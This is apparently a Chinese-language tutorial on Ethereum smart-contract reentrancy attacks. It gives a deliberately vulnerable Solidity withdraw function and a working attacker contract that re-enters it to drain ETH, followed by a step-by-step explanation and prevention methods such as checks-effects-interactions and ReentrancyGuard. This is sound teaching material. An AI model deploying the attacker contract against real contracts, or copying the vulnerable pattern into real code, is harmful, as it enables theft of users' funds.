合约漏洞之重入攻击

智能合约的重入攻击（Reentrancy Attack）是一种针对智能合约的攻击方式，主要发生在基于以太坊这样的支持智能合约的区块链平台上。重入攻击利用了智能合约中的函数可在执行完毕前被再次调用（重入）的性质，导致合约逻辑的非预期执行，通常是为了窃取合约中的资金。

攻击原理：

1. 调用性质：当一个合约调用另一个合约时，被调用的合约可以在调用者完成其操作前执行代码，如果调用者合约的状态还未更新，这就可能被恶意利用。
2. 状态一致性：由于状态更新（比如，减少调用者余额）可能在外部调用之后进行，攻击者可以通过在外部调用期间发起新的调用（重入），来重复执行某个操作，从而提取超过其原本应得的数量。

为了理解重入攻击的工作原理，下面是一个简化的代码示例，用于模拟如何进行重入攻击。这个例子以一个运行在以太坊上的智能合约为基础。首先，我们有一个受害者合约（VulnerableContract），该合约包含一个可以被提取资金的功能，但是由于它在发送ETH之前没有正确地更新其状态，因此它容易受到重入攻击。

solidity

scss

复制代码

// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; // 受害者合约（Vulnerable） contract VulnerableContract { mapping(address => uint) public balances; // 存款函数 function deposit() public payable { require(msg.value > 0, "You need to deposit some ether"); balances[msg.sender] += msg.value; } // 提现函数 function withdraw() public { uint balance = balances[msg.sender]; require(balance > 0, "Insufficient balance"); (bool sent, ) = msg.sender.call{value: balance}(""); require(sent, "Failed to send Ether"); // 重要的安全漏洞：在发送Ether之后修改用户余额 balances[msg.sender] = 0; } } // 攻击者合约（Attacker） contract Attacker { VulnerableContract public vulnerable; constructor(address _vulnerableAddress) { vulnerable = VulnerableContract(_vulnerableAddress); } // 收到ETH时的Fallback函数 receive() external payable { if (address(vulnerable).balance > 0) { vulnerable.withdraw(); } } // 向受害者合约存款以便稍后提取 function deposit() public payable { vulnerable.deposit{value: msg.value}(); } // 开始攻击 function attack() public { vulnerable.withdraw(); } // 提取在攻击合约中累积的Ether到攻击者的地址 function collectEther() public { payable(msg.sender).transfer(address(this).balance); } // 获取合约的余额 function getBalance() public view returns (uint) { return address(this).balance; } }

如何运作：

1. 攻击者通过deposit函数向VulnerableContract存款ETH。
2. 攻击者调用attack函数，触发VulnerableContract的withdraw函数，开始提款流程。
3. 在VulnerableContract的withdraw函数中，ETH被发送到攻击者合约地址，触发Attacker合约的fallback函数。
4. 在fallback函数中，检查VulnerableContract中是否还有ETH。如果有，就再次调用withdraw函数。
5. 由于VulnerableContract在发送ETH后才重置用户的余额，这就允许攻击者合约在VulnerableContract的余额归零之前，多次提取ETH。

合约的重入攻击是对智能合约执行逻辑的一种操纵，这种攻击不限于任何特定的区块链，而是适用于所有支持相关类型智能合约功能的区块链。具体来说，任何允许合约在执行操作中调用另一个合约，并且在调用执行完毕前不会更新其内部状态的区块链都可能面临重入攻击的风险。最著名的案例之一是以太坊（Ethereum）上发生的DAO攻击。

以下是目前可能受到重入攻击风险的一些区块链平台：

1. 以太坊 (Ethereum)：最早也是最常见的智能合约平台之一，因为其强大的智能合约功能和广泛的使用。
2. 以太坊克隆（Ethereum Forks） ：像Binance Smart Chain (BSC) 或 Polygon (Matic) 这样的以太坊克隆，由于其智能合约的执行机制与以太坊类似，仍然可能遭受重入攻击。
3. EOS：虽然其处理智能合约的方式与以太坊有所不同，但理论上也可能出现类似的重入问题。
4. Tron：这是另一个支持智能合约的区块链平台，其智能合约功能类似于以太坊，因而也可能面临重入风险。
5. 其他智能合约平台：如Tezos、Cardano、Solana等支持智能合约的平台，也可能根据其智能合约的设计和执行细节面临重入攻击的风险。

请注意，这个例子只是为了演示重入攻击，并不意味着实际应用。在真实的开发环境中，应当尽可能避免这类安全问题，同时采用复审和测试的方法来确保合约安全。

预防重入攻击主要有以下几种方式：

1. 检查-效应-交互原则 (Checks-Effects-Interactions Pattern)  - 这是最常用和有效的预防重入攻击的方式。你需要先进行检查操作（例如数据的有效性检查），然后进行效应操作（例如修改状态变量等），最后再进行交互操作（例如调用其他合约函数或者发送Ether）。按照这个原则，你应该在向外部调用发送资金或手续费等交互操作之前，先对所有的内部状态进行修改。

2. 使用Mutex（互斥量）  - 通过为合约加入一个状态变量（例如名为"isBusy"的布尔变量），在每个公开的可交互函数最开始添加"require"条件来确认"isBusy"是false。然后在进入函数时立即设置"isBusy"为true，并确保在函数最后将"isBusy"设置为false。这种方式可以保证任何时候只有一个函数能够操作合约，防止了重入。

3. 使用transfer()和send()代替call().value()  - 在Solidity中，transfer()和send()函数默认只提供2300 gas，对于调用其他合约的函数是远远不够的，因此能有效防止被重入攻击。但要注意，从Istanbul硬分叉后，2300 gas可能不足以完成接收者的fallback函数，因此可能会导致合约失效，所以现在一般不推荐用这种方法。

4. 避免在合约逻辑中使用call()函数 - call()函数虽然可以提供足够的gas执行复杂的操作，但这也为重入攻击提供了可能。如果非要使用，确保准确理解它的行为，并且不能依赖它来安全地修改合约状态。

5. 使用修改器（Modifier）来防止重入 - 可以创建一个修改器preventReentrancy，并在可以被重入的函数上加上这个修改器，用于防止该函数被重入。

6. 使用已经被普遍接受和审计过的库 - 例如OpenZeppelin的ReentrancyGuard，已经进行过严格的审计并被广大开发者接受。

总的来说，编写合约时，尤其是那些涉及到财物操作的合约，必须慎之又慎，要养成良好的编程习惯，确保合约的安全性。